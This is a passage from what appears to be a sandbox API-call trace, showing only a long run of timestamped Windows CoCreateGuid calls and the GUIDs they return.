[7]=0x9a))) returned 0x0 [0096.168] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xb98c1d40, Data2=0xc9a6, Data3=0x4692, Data4=([0]=0xbb, [1]=0xd4, [2]=0x8e, [3]=0x16, [4]=0x6b, [5]=0x9b, [6]=0x62, [7]=0x2a))) returned 0x0 [0096.168] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc0030f39, Data2=0x8f56, Data3=0x44df, Data4=([0]=0xa8, [1]=0x96, [2]=0x46, [3]=0xa, [4]=0xf7, [5]=0x54, [6]=0xc8, [7]=0xda))) returned 0x0 [0096.168] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4e0c8b28, Data2=0x4a11, Data3=0x4fc5, Data4=([0]=0x84, [1]=0xb6, [2]=0x15, [3]=0x6b, [4]=0x96, [5]=0x34, [6]=0xd7, [7]=0x38))) returned 0x0 [0096.173] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3d148a89, Data2=0x1e88, Data3=0x4419, Data4=([0]=0x80, [1]=0xcc, [2]=0x5d, [3]=0xd1, [4]=0x99, [5]=0x68, [6]=0xe6, [7]=0x20))) returned 0x0 [0096.177] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x1eaa033a, Data2=0xc27d, Data3=0x4c53, Data4=([0]=0xb4, [1]=0x7b, [2]=0x4f, [3]=0x7, [4]=0x22, [5]=0xed, [6]=0x64, [7]=0x28))) returned 0x0 [0096.184] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xfba1bac0, Data2=0xdec1, Data3=0x48b1, Data4=([0]=0xad, [1]=0x31, [2]=0x47, [3]=0x36, [4]=0xaa, [5]=0x7c, [6]=0x9, [7]=0x43))) returned 0x0 [0096.184] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x6a731930, Data2=0xe8d5, Data3=0x4823, Data4=([0]=0xaf, [1]=0xf6, [2]=0x85, [3]=0x10, [4]=0x5b, [5]=0x27, [6]=0x6, [7]=0xf0))) returned 0x0 [0096.194] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x9a749e56, Data2=0xe182, Data3=0x4e23, Data4=([0]=0xb5, [1]=0x1a, [2]=0xa5, [3]=0xd6, [4]=0xf1, [5]=0x9c, [6]=0x94, [7]=0xe0))) returned 0x0 [0096.195] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3e965c7e, Data2=0x6aca, Data3=0x4cac, Data4=([0]=0x81, [1]=0x15, [2]=0x7a, [3]=0xfa, [4]=0x5f, [5]=0xef, [6]=0xce, [7]=0x87))) returned 0x0 [0096.427] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc2eb5434, Data2=0xc373, Data3=0x49ff, Data4=([0]=0xae, [1]=0x77, [2]=0xda, [3]=0x5f, [4]=0x46, [5]=0xb8, [6]=0x5c, [7]=0xb7))) returned 0x0 [0096.427] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc4ec5f13, Data2=0x2fa9, Data3=0x41af, Data4=([0]=0x84, [1]=0x91, [2]=0xf3, [3]=0x97, [4]=0x3, [5]=0x30, [6]=0x54, [7]=0x7e))) returned 0x0 [0096.427] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc2579991, Data2=0xec5e, Data3=0x44f8, Data4=([0]=0x83, [1]=0x9a, [2]=0xcd, [3]=0xe0, [4]=0x11, [5]=0x41, [6]=0x4, [7]=0x83))) returned 0x0 [0096.437] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf8b7dacf, Data2=0xfd7, Data3=0x44d5, Data4=([0]=0xa4, [1]=0xfc, [2]=0xd0, [3]=0x13, [4]=0xd6, [5]=0xc5, [6]=0x6e, [7]=0x46))) returned 0x0 [0096.485] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x7ddcdcea, Data2=0x37b6, Data3=0x4418, Data4=([0]=0x83, [1]=0xfe, [2]=0x30, [3]=0xfe, [4]=0x26, [5]=0x6a, [6]=0x27, [7]=0x9))) returned 0x0 [0096.490] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4072dd47, Data2=0x6d73, Data3=0x4a2b, Data4=([0]=0xba, [1]=0x9c, [2]=0x9a, [3]=0x58, [4]=0x6, [5]=0x6b, [6]=0x9f, [7]=0x25))) returned 0x0 [0096.490] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xbc90b4d9, Data2=0xa12e, Data3=0x4294, Data4=([0]=0xab, [1]=0x7e, [2]=0x75, [3]=0x27, [4]=0x79, [5]=0xc8, [6]=0xe1, [7]=0x39))) returned 0x0 [0096.494] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xd9964ee6, Data2=0x5083, Data3=0x4da8, Data4=([0]=0xa7, [1]=0x37, [2]=0xf0, [3]=0x48, [4]=0xf2, [5]=0xca, [6]=0xce, [7]=0xd4))) returned 0x0 [0096.499] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xe82c87eb, Data2=0xa50b, Data3=0x4e0d, Data4=([0]=0x8a, [1]=0xb3, [2]=0x83, [3]=0x45, [4]=0x50, [5]=0x69, [6]=0x99, [7]=0x34))) returned 0x0 [0096.699] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc833499e, Data2=0x69cc, Data3=0x4e7a, Data4=([0]=0xb3, [1]=0xc, [2]=0x38, [3]=0xa1, [4]=0xf2, [5]=0x81, [6]=0xdb, [7]=0xa2))) returned 0x0 [0096.705] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x13eb7a98, Data2=0x5fc3, Data3=0x4bb3, Data4=([0]=0xbf, [1]=0x9d, [2]=0x5c, [3]=0xb8, [4]=0x13, [5]=0x40, [6]=0x29, [7]=0x9c))) returned 0x0 [0096.711] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x75eb6314, Data2=0xef75, Data3=0x4548, Data4=([0]=0xa4, [1]=0xbd, [2]=0x1, [3]=0x33, [4]=0x39, [5]=0x1a, [6]=0xf5, [7]=0xc5))) returned 0x0 [0096.716] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x9533e94d, Data2=0xed6d, Data3=0x401c, Data4=([0]=0xbb, [1]=0xb0, [2]=0xeb, [3]=0x3b, [4]=0xc4, [5]=0x9d, [6]=0x61, [7]=0x6c))) returned 0x0 [0096.772] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xb80f910b, Data2=0x4c47, Data3=0x4504, Data4=([0]=0xa4, [1]=0x93, [2]=0xb9, [3]=0xcb, [4]=0x71, [5]=0xc0, [6]=0x50, [7]=0xfa))) returned 0x0 [0096.777] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf0fbf0db, Data2=0x937f, Data3=0x4018, Data4=([0]=0xa0, [1]=0x7b, [2]=0x8, [3]=0xd5, [4]=0x99, [5]=0xed, [6]=0xf1, [7]=0x51))) returned 0x0 [0096.976] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x69620571, Data2=0xc1a2, Data3=0x4308, Data4=([0]=0xba, [1]=0x50, [2]=0x78, [3]=0x51, [4]=0x99, [5]=0xf7, [6]=0x94, [7]=0x37))) returned 0x0 [0096.980] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x78729f48, Data2=0xff45, Data3=0x472b, Data4=([0]=0x85, [1]=0x5e, [2]=0xce, [3]=0xf5, [4]=0xc5, [5]=0xb, [6]=0x23, [7]=0xce))) returned 0x0 [0096.985] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf61f7a37, Data2=0x212a, Data3=0x423a, Data4=([0]=0x83, [1]=0xb0, [2]=0x1a, [3]=0xd8, [4]=0x1f, [5]=0xb4, [6]=0xf2, [7]=0xac))) returned 0x0 [0096.990] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x63f9fa8c, Data2=0xf332, Data3=0x45d3, Data4=([0]=0xbc, [1]=0xda, [2]=0x21, [3]=0x43, [4]=0xf, [5]=0xb7, [6]=0x73, [7]=0x3e))) returned 0x0 [0096.994] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x749e0c13, Data2=0x1928, Data3=0x4e0d, Data4=([0]=0x9d, [1]=0x57, [2]=0xfa, [3]=0xf3, [4]=0x2f, [5]=0x1b, [6]=0xd0, [7]=0xed))) returned 0x0 [0096.999] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc74f477c, Data2=0x382, Data3=0x4af5, Data4=([0]=0xbc, [1]=0x63, [2]=0x65, [3]=0xe8, [4]=0x99, [5]=0xca, [6]=0xf3, [7]=0x46))) returned 0x0 [0097.005] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x12ab97b2, Data2=0xf1e9, Data3=0x4d70, Data4=([0]=0x8d, [1]=0xb1, [2]=0x7, [3]=0x63, [4]=0xa3, [5]=0x64, [6]=0x66, [7]=0x94))) returned 0x0 [0097.010] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x6c36c256, Data2=0x476a, Data3=0x4578, Data4=([0]=0xb5, [1]=0x6d, [2]=0xf6, [3]=0x36, [4]=0xd0, [5]=0x87, [6]=0x24, [7]=0xda))) returned 0x0 [0097.015] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc4c03d94, Data2=0x4a95, Data3=0x45fb, Data4=([0]=0xaa, [1]=0xcf, [2]=0xe8, [3]=0x1b, [4]=0xf, [5]=0xe7, [6]=0x89, [7]=0x19))) returned 0x0 [0097.193] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xac2d3791, Data2=0xcfab, Data3=0x4f5e, Data4=([0]=0xa0, [1]=0xfc, [2]=0xe, [3]=0xad, [4]=0x4c, [5]=0x4b, [6]=0xeb, [7]=0xa0))) returned 0x0 [0097.199] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xba872c9, Data2=0x2148, Data3=0x4800, Data4=([0]=0xab, [1]=0x8b, [2]=0xc7, [3]=0x21, [4]=0x47, [5]=0x63, [6]=0x41, [7]=0x51))) returned 0x0 [0097.206] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4ffff342, Data2=0x28b7, Data3=0x41eb, Data4=([0]=0x81, [1]=0x98, [2]=0xcc, [3]=0xf5, [4]=0x0, [5]=0x90, [6]=0x2c, [7]=0xf4))) returned 0x0 [0097.212] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x32713404, Data2=0xb9ac, Data3=0x4da1, Data4=([0]=0xa2, [1]=0x65, [2]=0x1e, [3]=0x18, [4]=0xd9, [5]=0xcf, [6]=0x9, [7]=0xe8))) returned 0x0 [0097.217] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xe92a5d35, Data2=0xf905, Data3=0x4567, Data4=([0]=0x94, [1]=0x92, [2]=0x8d, [3]=0xb3, [4]=0x4b, [5]=0x1c, [6]=0x38, [7]=0xdd))) returned 0x0 [0097.219] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x8244fd56, Data2=0x4265, Data3=0x4942, Data4=([0]=0xaf, [1]=0xc6, [2]=0x13, [3]=0xc1, [4]=0xb, [5]=0x1, [6]=0x4a, [7]=0x32))) returned 0x0 [0097.225] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x2dfe2eeb, Data2=0xe0e8, Data3=0x46a8, Data4=([0]=0x83, [1]=0xe5, [2]=0x6c, [3]=0x91, [4]=0xdb, [5]=0x6e, [6]=0x63, [7]=0xe4))) returned 0x0 [0097.231] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x60cf9fbf, Data2=0x240d, Data3=0x46dd, Data4=([0]=0x90, [1]=0xfd, [2]=0x2c, [3]=0xa, [4]=0x97, [5]=0x5e, [6]=0xad, [7]=0xc7))) returned 0x0 [0097.481] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x65e5305d, Data2=0x2677, Data3=0x45bf, Data4=([0]=0x83, [1]=0x13, [2]=0x5e, [3]=0x7, [4]=0xad, [5]=0xd1, [6]=0x9c, [7]=0x40))) returned 0x0 [0097.483] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3d96aa0e, Data2=0x6205, Data3=0x4368, Data4=([0]=0x91, [1]=0x9c, [2]=0xa, [3]=0x1f, [4]=0xf4, [5]=0xc8, [6]=0xa7, [7]=0x95))) returned 0x0 [0097.486] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x665c286, Data2=0x9de6, Data3=0x41f3, Data4=([0]=0x89, [1]=0xc2, [2]=0x38, [3]=0x48, [4]=0xba, [5]=0xe, [6]=0x15, [7]=0x5a))) returned 0x0 [0097.488] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x5d22031e, Data2=0x51d3, Data3=0x468b, Data4=([0]=0x95, [1]=0xf1, [2]=0x5c, [3]=0x89, [4]=0x65, [5]=0x7e, [6]=0x89, [7]=0xab))) returned 0x0 [0097.490] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x9a66439, Data2=0x7a56, Data3=0x46bc, Data4=([0]=0xa6, [1]=0x9e, [2]=0xf3, [3]=0x45, [4]=0xc2, [5]=0xe8, [6]=0x69, [7]=0xb))) returned 0x0 [0097.493] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa26c5503, Data2=0xe353, Data3=0x470a, Data4=([0]=0xa2, [1]=0x54, [2]=0x2e, [3]=0x6a, [4]=0x3a, [5]=0xca, [6]=0xab, [7]=0xb1))) returned 0x0 [0097.495] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa7ef99b9, Data2=0xeb58, Data3=0x410e, Data4=([0]=0x87, [1]=0x40, [2]=0x8e, [3]=0xdd, [4]=0xd4, [5]=0x6c, [6]=0x2a, [7]=0xbe))) returned 0x0 [0097.498] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xfa3bc713, Data2=0xa67c, Data3=0x43c5, Data4=([0]=0x82, [1]=0x56, [2]=0xba, [3]=0xe5, [4]=0xce, [5]=0xae, [6]=0x9b, [7]=0x69))) returned 0x0 [0097.500] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x68334d27, Data2=0x5b9f, Data3=0x401f, Data4=([0]=0xb7, [1]=0x47, [2]=0x70, [3]=0x85, [4]=0xc9, [5]=0xf1, [6]=0xba, [7]=0xb8))) returned 0x0 [0097.503] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x237d2789, Data2=0xbb16, Data3=0x4c08, Data4=([0]=0x8a, [1]=0x10, [2]=0xb3, [3]=0xb0, [4]=0xba, [5]=0x67, [6]=0xf2, [7]=0x6f))) returned 0x0 [0097.506] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x5f398349, Data2=0x9324, Data3=0x462a, Data4=([0]=0x9e, [1]=0x74, [2]=0xaa, [3]=0xa4, [4]=0x69, [5]=0x2a, [6]=0x64, [7]=0x6d))) returned 0x0 [0097.508] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xf85a78ae, Data2=0x2900, Data3=0x4d49, Data4=([0]=0x83, [1]=0x17, [2]=0xf8, [3]=0x67, [4]=0x89, [5]=0x2f, [6]=0x74, [7]=0x4a))) returned 0x0 [0097.510] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xdce8aa89, Data2=0xe6bf, Data3=0x4ba8, Data4=([0]=0x92, [1]=0xc0, [2]=0xd0, [3]=0x6b, [4]=0x43, [5]=0xa3, [6]=0x41, [7]=0xb3))) returned 0x0 [0097.512] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xfe32d2eb, Data2=0x5110, Data3=0x490f, Data4=([0]=0x84, [1]=0x73, [2]=0x17, [3]=0xaa, [4]=0xdf, [5]=0x5b, [6]=0xe0, [7]=0x9))) returned 0x0 [0098.003] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x93d72d83, Data2=0xbf5, Data3=0x4410, Data4=([0]=0x84, [1]=0xc8, [2]=0xd3, [3]=0x3d, [4]=0x2a, [5]=0x87, [6]=0xd5, [7]=0xbe))) returned 0x0 [0098.007] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x212f656d, Data2=0x5b29, Data3=0x48c5, Data4=([0]=0xb0, [1]=0x8, [2]=0x9, [3]=0x70, [4]=0x4c, [5]=0xed, [6]=0x1f, [7]=0xee))) returned 0x0 [0098.009] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xe1d1bf54, Data2=0x800c, Data3=0x443b, Data4=([0]=0x9e, [1]=0x5b, [2]=0x55, [3]=0xdd, [4]=0xe7, [5]=0x9d, [6]=0x7a, [7]=0x95))) returned 0x0 [0098.011] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x59182dd5, Data2=0x9e6a, Data3=0x4dcf, Data4=([0]=0xa3, [1]=0xbd, [2]=0x18, [3]=0x48, [4]=0xf4, [5]=0x41, [6]=0xe5, [7]=0x3f))) returned 0x0 [0098.012] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x2b3b2ae0, Data2=0xf280, Data3=0x4322, Data4=([0]=0x89, [1]=0x60, [2]=0x8a, [3]=0xf8, [4]=0xad, [5]=0xdd, [6]=0xc9, [7]=0x17))) returned 0x0 [0098.014] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x67fc80b1, Data2=0x2f2f, Data3=0x4bcf, Data4=([0]=0x9d, [1]=0xf7, [2]=0x56, [3]=0x4c, [4]=0x6, [5]=0x5a, [6]=0xbf, [7]=0x75))) returned 0x0 [0098.015] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x701ce6b2, Data2=0x2737, Data3=0x4e37, Data4=([0]=0xaf, [1]=0xdb, [2]=0x9c, [3]=0x81, [4]=0xc, [5]=0x95, [6]=0x81, [7]=0xe2))) returned 0x0 [0098.019] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x6a1d7ce2, Data2=0x8e42, Data3=0x46ce, Data4=([0]=0xab, [1]=0xfa, [2]=0x40, [3]=0xdf, [4]=0x7f, [5]=0xc3, [6]=0xa6, [7]=0x10))) returned 0x0 [0098.019] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x71b3340e, Data2=0xae2f, Data3=0x4b5b, Data4=([0]=0x8e, [1]=0x8b, [2]=0x12, [3]=0x9b, [4]=0xe2, [5]=0x32, [6]=0x3d, [7]=0x6f))) returned 0x0 [0098.020] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc54c4897, Data2=0x72e6, Data3=0x4d67, Data4=([0]=0xb1, [1]=0xde, [2]=0xbd, [3]=0xf1, [4]=0xe5, [5]=0xde, [6]=0xd4, [7]=0xf9))) returned 0x0 [0098.021] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x81c78755, Data2=0x6524, Data3=0x47c4, Data4=([0]=0x8d, [1]=0x3a, [2]=0x4c, [3]=0x59, [4]=0xb6, [5]=0x3e, [6]=0xf8, [7]=0xb4))) returned 0x0 [0098.023] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xbf10f289, Data2=0xbecb, Data3=0x4cc4, Data4=([0]=0xb4, [1]=0xf8, [2]=0xbd, [3]=0x5a, [4]=0x5f, [5]=0xf6, [6]=0x3, [7]=0x5b))) returned 0x0 [0098.510] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xafe0037c, Data2=0x45da, Data3=0x4af2, Data4=([0]=0xa6, [1]=0x5d, [2]=0x19, [3]=0xd, [4]=0xcd, [5]=0xae, [6]=0xaf, [7]=0xd8))) returned 0x0 [0098.518] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x618d070d, Data2=0x276, Data3=0x4b3b, Data4=([0]=0xbc, [1]=0x37, [2]=0xf9, [3]=0x4, [4]=0x54, [5]=0x52, [6]=0xfd, [7]=0x3c))) returned 0x0 [0098.524] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x994f4fa1, Data2=0x3702, Data3=0x4ece, Data4=([0]=0x9b, [1]=0x1e, [2]=0xcc, [3]=0x9e, [4]=0x31, [5]=0x4f, [6]=0xdd, [7]=0x24))) returned 0x0 [0098.657] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x43878d80, Data2=0x6545, Data3=0x4906, Data4=([0]=0xae, [1]=0x3a, [2]=0xf8, [3]=0xa6, [4]=0x48, [5]=0x83, [6]=0x19, [7]=0x70))) returned 0x0 [0098.664] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x67cf45df, Data2=0x456, Data3=0x49e2, Data4=([0]=0xa0, [1]=0x66, [2]=0x1e, [3]=0x9b, [4]=0x9f, [5]=0xd6, [6]=0xf6, [7]=0xf3))) returned 0x0 [0098.669] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xbc8a400, Data2=0x46df, Data3=0x46be, Data4=([0]=0xa3, [1]=0x21, [2]=0x35, [3]=0x4, [4]=0xcf, [5]=0x2a, [6]=0x88, [7]=0x81))) returned 0x0 [0098.675] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xc8191fdb, Data2=0x7275, Data3=0x48d4, Data4=([0]=0x83, [1]=0xe5, [2]=0xd0, [3]=0xf, [4]=0xd8, [5]=0xc9, [6]=0x1b, [7]=0xe0))) returned 0x0 [0098.678] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x790aef1a, Data2=0xb0d, Data3=0x4bf8, Data4=([0]=0xa5, [1]=0xb9, [2]=0x56, [3]=0x4d, [4]=0x82, [5]=0xed, [6]=0xa0, [7]=0x7))) returned 0x0 [0098.679] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x4b1aec78, Data2=0x7566, Data3=0x471b, Data4=([0]=0x9a, [1]=0x90, [2]=0xeb, [3]=0xe8, [4]=0x58, [5]=0xd2, [6]=0xa, [7]=0x31))) returned 0x0 [0098.681] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x42465f5a, Data2=0x69f5, Data3=0x4482, Data4=([0]=0xa2, [1]=0x61, [2]=0xe5, [3]=0xdd, [4]=0xa5, [5]=0x27, [6]=0xce, [7]=0x46))) returned 0x0 [0098.682] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x1eb4f6ee, Data2=0xe612, Data3=0x41e9, Data4=([0]=0x9e, [1]=0x67, [2]=0x1b, [3]=0x62, [4]=0x52, [5]=0x34, [6]=0xb4, [7]=0x16))) returned 0x0 [0098.683] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x479dd5f4, Data2=0xbbb6, Data3=0x4010, Data4=([0]=0x88, [1]=0x3f, [2]=0xce, [3]=0xae, [4]=0x78, [5]=0xed, [6]=0xe2, [7]=0xe1))) returned 0x0 [0098.684] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x5a40c6b3, Data2=0x67b4, Data3=0x4f10, Data4=([0]=0x88, [1]=0xd7, [2]=0xe, [3]=0xbf, [4]=0x89, [5]=0x62, [6]=0x68, [7]=0x47))) returned 0x0 [0098.685] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xe0af98dc, Data2=0x2225, Data3=0x402c, Data4=([0]=0xbf, [1]=0x1d, [2]=0x8c, [3]=0x1f, [4]=0xc7, [5]=0xf1, [6]=0xf7, [7]=0x9b))) returned 0x0 [0098.686] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x96d85b3a, Data2=0x8978, Data3=0x491c, Data4=([0]=0x9c, [1]=0x46, [2]=0xb, [3]=0xe3, [4]=0xb5, [5]=0x1a, [6]=0xf9, [7]=0xad))) returned 0x0 [0098.688] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x700eae5d, Data2=0xaf75, Data3=0x4125, Data4=([0]=0x9e, [1]=0xf, [2]=0x52, [3]=0x87, [4]=0xe5, [5]=0x26, [6]=0x5c, [7]=0x76))) returned 0x0 [0098.690] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x22fef217, Data2=0xce5e, Data3=0x4bd5, Data4=([0]=0xa1, [1]=0xb8, [2]=0xd2, [3]=0x54, [4]=0xba, [5]=0xf0, [6]=0x43, [7]=0xab))) returned 0x0 [0098.691] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xbd3e9ce, Data2=0x1b4f, Data3=0x4f82, Data4=([0]=0x99, [1]=0xcf, [2]=0xe2, [3]=0xbf, [4]=0x3a, [5]=0x9e, [6]=0xe5, [7]=0x46))) returned 0x0 [0098.693] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x176cafb3, Data2=0x9cb, Data3=0x419f, Data4=([0]=0xbf, [1]=0x71, [2]=0x77, [3]=0xdd, [4]=0xe0, [5]=0x6a, [6]=0x18, [7]=0x26))) returned 0x0 [0098.694] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x1fd8e94b, Data2=0x9f87, Data3=0x45ac, Data4=([0]=0x9b, [1]=0x6e, [2]=0xb3, [3]=0x2a, [4]=0xe2, [5]=0x66, [6]=0x9a, [7]=0xa8))) returned 0x0 [0098.695] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x3bd937aa, Data2=0x3e52, Data3=0x43b1, Data4=([0]=0xad, [1]=0x3b, [2]=0xc3, [3]=0x7c, [4]=0x4a, [5]=0xf0, [6]=0x23, [7]=0x45))) returned 0x0 [0098.696] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xb504f096, Data2=0x2f76, Data3=0x4508, Data4=([0]=0x9b, [1]=0x97, [2]=0x34, [3]=0x96, [4]=0x51, [5]=0x48, [6]=0x9f, [7]=0x8a))) returned 0x0 [0098.698] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xa1cdb99f, Data2=0xc6c4, Data3=0x4899, Data4=([0]=0xa8, [1]=0xfb, [2]=0x97, [3]=0x73, [4]=0xcd, [5]=0xf9, [6]=0x7a, [7]=0x46))) returned 0x0 [0098.699] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xefa40282, Data2=0x8ce9, Data3=0x4292, Data4=([0]=0xa6, [1]=0xf7, [2]=0xd3, [3]=0xc2, [4]=0xc, [5]=0x3d, [6]=0xdb, [7]=0x88))) returned 0x0 [0098.700] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xe9d719e2, Data2=0x1edc, Data3=0x4e4d, Data4=([0]=0xa7, [1]=0xf4, [2]=0x4, [3]=0xb6, [4]=0xf5, [5]=0xe, [6]=0x4f, [7]=0xd4))) returned 0x0 [0098.817] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x90d9baf9, Data2=0x324a, Data3=0x4b20, Data4=([0]=0x93, [1]=0xc9, [2]=0x68, [3]=0xe2, [4]=0x81, [5]=0x8f, [6]=0x7, [7]=0x17))) returned 0x0 [0098.819] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0xfdcdb1bf, Data2=0x51e6, Data3=0x49e4, Data4=([0]=0xa5, [1]=0x35, [2]=0xb3, [3]=0xa3, [4]=0x33, [5]=0x7b, [6]=0x2b, [7]=0xb5))) returned 0x0 [0098.822] CoCreateGuid (in: pguid=0x6c3f494 | out: pguid=0x6c3f494*(Data1=0x9a17b2b1, Data2=0x44c1, Data3=0x4007, Data4=([0]=0xb0, [1]=0x8a, [2]=0xd9, [3]=0xa0, [4]=0xa4, [5]=0xeb, [6]=0x36, [7]=0x59))) returned 0x0 [0098.824] CoCreateGuid (in: 